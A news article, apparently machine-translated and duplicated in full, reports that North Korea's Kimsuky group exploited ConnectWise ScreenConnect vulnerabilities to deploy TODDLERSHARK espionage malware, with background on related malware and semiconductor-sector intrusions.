BY TODDLERSHARK and CVE-2024-1708 — the perfect combo for a cyber spy.
North Korean hackers used recently discovered vulnerabilities in ConnectWise ScreenConnect to deploy a new malware called TODDLERS Spark.
According to a report from Kroll, TODDLERS have similar features to well-known Kimsuky malware such as BabyShark and ReconShark.
"Attackers gained access to victims' workstations by exploiting a vulnerability in the ScreenConnect application setup wizard, " report information security researchers Keith Wojciechek, George Glass, and Dave Truman. "They then used the access they gained to execute mshta.exe with the URL of malware written in Visual Basic."
We are talking about the ConnectWise vulnerabilities CVE-2024-1708 and CVE-2024-1709, which became known at end of February . Since then, they have been actively exploited by various groups to deliver cryptocurrency miners, ransomware, remote access software, and infostealers.
The Kimsuky group, also known as APT43, is constantly expanding its arsenal of malware, the latest of which are GoBear and Troll Stealer. BabyShark, discovered at the end of 2018, is launched using an HTML application. Once inside the system, it steals system information, remains present, and waits for further instructions from the operator.
In May 2023, a variant of BabyShark called ReconShark was spotted spreading through phishing emails. TODDLERS SPARK is considered the newest evolution of this malware because of the similarity of code and tactics.
Basically, this software is designed to steal confidential data from compromised systems, acting as a cyber espionage tool.
The developers warn that TODDLERSHARK "exhibits elements of polymorphic behavior, which may make it difficult to detect in some environments."
Meanwhile, South Korea's National Intelligence Service accused North Korea of compromising the servers of two domestic semiconductor manufacturers and stealing valuable data in December 2023 and February 2024. It is suggested that North Korea may be preparing for its own production of semiconductors due to procurement difficulties caused by sanctions and the growing demand for them for weapons development.
North Korean hackers used recently discovered vulnerabilities in ConnectWise ScreenConnect to deploy a new malware called TODDLERS Spark.
According to a report from Kroll, TODDLERS have similar features to well-known Kimsuky malware such as BabyShark and ReconShark.
"Attackers gained access to victims' workstations by exploiting a vulnerability in the ScreenConnect application setup wizard, " report information security researchers Keith Wojciechek, George Glass, and Dave Truman. "They then used the access they gained to execute mshta.exe with the URL of malware written in Visual Basic."
We are talking about the ConnectWise vulnerabilities CVE-2024-1708 and CVE-2024-1709, which became known at end of February . Since then, they have been actively exploited by various groups to deliver cryptocurrency miners, ransomware, remote access software, and infostealers.
The Kimsuky group, also known as APT43, is constantly expanding its arsenal of malware, the latest of which are GoBear and Troll Stealer. BabyShark, discovered at the end of 2018, is launched using an HTML application. Once inside the system, it steals system information, remains present, and waits for further instructions from the operator.
In May 2023, a variant of BabyShark called ReconShark was spotted spreading through phishing emails. TODDLERS SPARK is considered the newest evolution of this malware because of the similarity of code and tactics.
Basically, this software is designed to steal confidential data from compromised systems, acting as a cyber espionage tool.
The developers warn that TODDLERSHARK "exhibits elements of polymorphic behavior, which may make it difficult to detect in some environments."
Meanwhile, South Korea's National Intelligence Service accused North Korea of compromising the servers of two domestic semiconductor manufacturers and stealing valuable data in December 2023 and February 2024. It is suggested that North Korea may be preparing for its own production of semiconductors due to procurement difficulties caused by sanctions and the growing demand for them for weapons development.
